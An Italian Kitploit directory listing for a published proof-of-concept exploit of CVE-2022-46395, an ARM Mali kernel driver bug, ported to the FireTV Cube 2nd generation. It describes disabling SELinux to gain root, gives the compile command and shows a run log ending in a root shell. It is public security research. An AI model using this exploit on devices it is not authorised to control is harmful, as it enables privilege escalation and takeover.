Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE_2022_46395_Raven — POC per CVE-2022-46395 su FireTV 2nd gen Cube (raven) | Kitploit
Strumenti/GitHubGitHub/pro-me3us/cve_2022_46395_raven
Sicurezza AndroidEscalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingBinary Exploitation
GitHubpro-me3us/cve_2022_46395_raven

CVE_2022_46395_Raven

POC per CVE-2022-46395 su FireTV 2nd gen Cube (raven)

Vedi Repository
132 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit per CVE-2022-46395 da eseguire su FireTV Cube di 2ª generazione

Questo è un fork del POC per Pixel 6 del ricercatore di sicurezza Man Yue Mo per CVE-2022-46395. Leggi il suo dettagliato write-up sulla vulnerabilità qui. Sono state apportate modifiche per tenere conto dello spazio utente a 32 bit di FireOS. Il POC sfrutta un bug nel driver del kernel ARM Mali per ottenere l'esecuzione arbitraria di codice nel kernel, che viene poi utilizzato per disabilitare SELinux e ottenere i permessi di root.

L'exploit è stato corretto in PS7652/3564 (fine agosto 2023). Per riferimento, il seguente comando è stato utilizzato per compilare con clang in ndk-21:

root@kitploit:~
android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi28-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o raven_buf

Per risultati più rapidi, eseguilo dopo un riavvio pulito. In media il POC impiega 2-5 minuti per ottenere i permessi di root.

root@kitploit:~
raven:/ $ /data/local/tmp/raven_buf
Amazon/raven/raven:9/PS7646.3565N/0028085972224:user/amz-p,release-keys
benchmark_time 138
failed after 100
finished reset: 342278966 fault: 338143633 195 err 0 read 3
failed to find pgd, retry
finished reset: 731402639 fault: 724605931 208 err 0 read 3
failed to find pgd, retry
finished reset: 67309348 fault: 66434848 210 err 0 read 3
failed to find pgd, retry
failed after 200
failed after 300
benchmark_time 135
failed after 400
failed after 500
failed after 600
benchmark_time 131
failed after 700
finish reset: 797174916 fault: 788811083 352 err 0 read 3
found pgd at page 6
overwrite addr : 104100634 634
overwrite addr : 104300634 634
overwrite addr : 1041001d0 1d0
overwrite addr : 1043001d0 1d0
result 50
raven:/ #
Scarica lo strumento